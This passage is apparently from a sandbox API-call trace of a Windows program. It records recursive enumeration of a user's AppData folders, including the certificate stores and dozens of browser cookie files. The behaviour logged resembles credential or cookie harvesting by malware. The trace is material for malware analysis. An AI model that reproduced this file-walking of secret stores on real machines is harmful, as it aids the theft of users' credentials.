pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0083.428] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.428] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="Certificates" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0083.428] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0083.428] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.428] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.428] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="CRLs" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0083.428] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0083.428] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.428] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.428] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="CTLs" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0083.428] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0083.428] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.428] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.428] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.428] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.428] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Templates" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates" [0083.429] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\*" [0083.429] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.429] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates", pszFile="LiveContent" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent" [0083.429] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*" [0083.429] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.429] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent", pszFile="16" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16" [0083.429] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*" [0083.429] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.429] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", pszFile="Managed" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed" [0083.429] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*" [0083.429] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.429] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", pszFile="Access Parts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts" [0083.429] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\*" [0083.429] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.429] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts", pszFile="1033" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033" [0083.429] PathCombineW (in: pszDest=0x18c500, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033\\*" [0083.429] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033\\*", lpFindFileData=0x18c2b0 | out: lpFindFileData=0x18c2b0) returned 0x586ce0 [0083.429] FindClose (in: hFindFile=0x586ce0 | out: hFindFile=0x586ce0) returned 1 [0083.429] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.429] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", pszFile="Document Themes" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes" [0083.429] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*" [0083.429] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.430] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes", pszFile="1033" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033" [0083.430] PathCombineW (in: pszDest=0x18c500, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*" [0083.430] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*", lpFindFileData=0x18c2b0 | out: lpFindFileData=0x18c2b0) returned 0x586ce0 [0083.430] FindClose (in: hFindFile=0x586ce0 | out: hFindFile=0x586ce0) returned 1 [0083.430] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.430] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.430] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", pszFile="User" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User" [0083.430] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*" [0083.430] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.430] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User", pszFile="Document Themes" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes" [0083.430] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*" [0083.430] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.430] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes", pszFile="1033" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033" [0083.430] PathCombineW (in: pszDest=0x18c500, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*" [0083.430] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*", lpFindFileData=0x18c2b0 | out: lpFindFileData=0x18c2b0) returned 0x586ce0 [0083.430] FindClose (in: hFindFile=0x586ce0 | out: hFindFile=0x586ce0) returned 1 [0083.430] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.430] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.430] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.431] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.431] PathMatchSpecW (pszFile="Normal.dotm", pszSpec="*") returned 1 [0083.431] PathMatchSpecW (pszFile="~$Normal.dotm", pszSpec="*") returned 1 [0083.431] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.431] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="UProof" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof" [0083.431] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof\\*" [0083.431] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.431] PathMatchSpecW (pszFile="CUSTOM.DIC", pszSpec="*") returned 1 [0083.431] PathMatchSpecW (pszFile="ExcludeDictionaryEN0409.lex", pszSpec="*") returned 1 [0083.431] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.431] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Windows" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows" [0083.431] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\*" [0083.431] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.431] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Cookies" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies" [0083.431] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*" [0083.431] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.431] PathMatchSpecW (pszFile="aetadzjz@g.live[1].txt", pszSpec="*") returned 1 [0083.431] PathMatchSpecW (pszFile="aetadzjz@google[2].txt", pszSpec="*") returned 1 [0083.431] PathMatchSpecW (pszFile="aetadzjz@live[1].txt", pszSpec="*") returned 1 [0083.431] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.431] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low" [0083.431] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*" [0083.431] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.432] PathMatchSpecW (pszFile="aetadzjz@ad.360yield[2].txt", pszSpec="*") returned 1 [0083.432] PathMatchSpecW (pszFile="aetadzjz@ad13.adfarm1.adition[2].txt", pszSpec="*") returned 1 [0083.432] PathMatchSpecW (pszFile="aetadzjz@addthis[2].txt", pszSpec="*") returned 1 [0083.432] PathMatchSpecW (pszFile="aetadzjz@adfarm1.adition[2].txt", pszSpec="*") returned 1 [0083.432] PathMatchSpecW (pszFile="aetadzjz@adformdsp[2].txt", pszSpec="*") returned 1 [0083.432] PathMatchSpecW (pszFile="aetadzjz@adform[2].txt", pszSpec="*") returned 1 [0083.432] PathMatchSpecW (pszFile="aetadzjz@adnxs[2].txt", pszSpec="*") returned 1 [0083.432] PathMatchSpecW (pszFile="aetadzjz@adscale[1].txt", pszSpec="*") returned 1 [0083.432] PathMatchSpecW (pszFile="aetadzjz@adserving.ancoraplatform[2].txt", pszSpec="*") returned 1 [0083.432] PathMatchSpecW (pszFile="aetadzjz@adsrvr[1].txt", pszSpec="*") returned 1 [0083.432] PathMatchSpecW (pszFile="aetadzjz@adtech[2].txt", pszSpec="*") returned 1 [0083.432] PathMatchSpecW (pszFile="aetadzjz@advertising[1].txt", pszSpec="*") returned 1 [0083.432] PathMatchSpecW (pszFile="aetadzjz@angsrvr[2].txt", pszSpec="*") returned 1 [0083.432] PathMatchSpecW (pszFile="aetadzjz@api.bing[2].txt", pszSpec="*") returned 1 [0083.432] PathMatchSpecW (pszFile="aetadzjz@at.atwola[2].txt", pszSpec="*") returned 1 [0083.432] PathMatchSpecW (pszFile="aetadzjz@bidswitch[1].txt", pszSpec="*") returned 1 [0083.432] PathMatchSpecW (pszFile="aetadzjz@bing[1].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@bluekai[1].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@bs.serving-sys[1].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@bs.serving-sys[3].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@c.bing[1].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@c.msn[2].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@c1.microsoft[2].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@casalemedia[2].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@connextra[2].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@crwdcntrl[1].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@demdex[1].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@doubleclick[2].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@dpm.demdex[1].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@exelator[1].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@eyeota[1].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@google[2].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@ibeu2.mookie1[2].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@ih.adscale[1].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@linkedin[2].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@m.exactag[2].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@mathtag[2].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@microsoft[1].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@msn[2].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@openx[1].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@pixel.rubiconproject[1].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@pubmatic[2].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@rubiconproject[1].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@scorecardresearch[2].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@semasio[1].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@server.adformdsp[2].txt", pszSpec="*") returned 1 [0083.433] PathMatchSpecW (pszFile="aetadzjz@serving-sys[2].txt", pszSpec="*") returned 1 [0083.434] PathMatchSpecW (pszFile="aetadzjz@serving.experianmarketingservices[1].txt", pszSpec="*") returned 1 [0083.434] PathMatchSpecW (pszFile="aetadzjz@smartadserver[1].txt", pszSpec="*") returned 1 [0083.434] PathMatchSpecW (pszFile="aetadzjz@tapad[2].txt", pszSpec="*") returned 1 [0083.434] PathMatchSpecW (pszFile="aetadzjz@track.adform[2].txt", pszSpec="*") returned 1 [0083.434] PathMatchSpecW (pszFile="aetadzjz@turn[1].txt", pszSpec="*") returned 1 [0083.434] PathMatchSpecW (pszFile="aetadzjz@w55c[2].txt", pszSpec="*") returned 1 [0083.434] PathMatchSpecW (pszFile="aetadzjz@www.bing[1].txt", pszSpec="*") returned 1 [0083.434] PathMatchSpecW (pszFile="aetadzjz@www.linkedin[1].txt", pszSpec="*") returned 1 [0083.434] PathMatchSpecW (pszFile="aetadzjz@www.msn[2].txt", pszSpec="*") returned 1 [0083.434] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.434] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.434] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.434] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="IECompatCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache" [0083.434] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*" [0083.434] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.434] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low" [0083.435] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*") 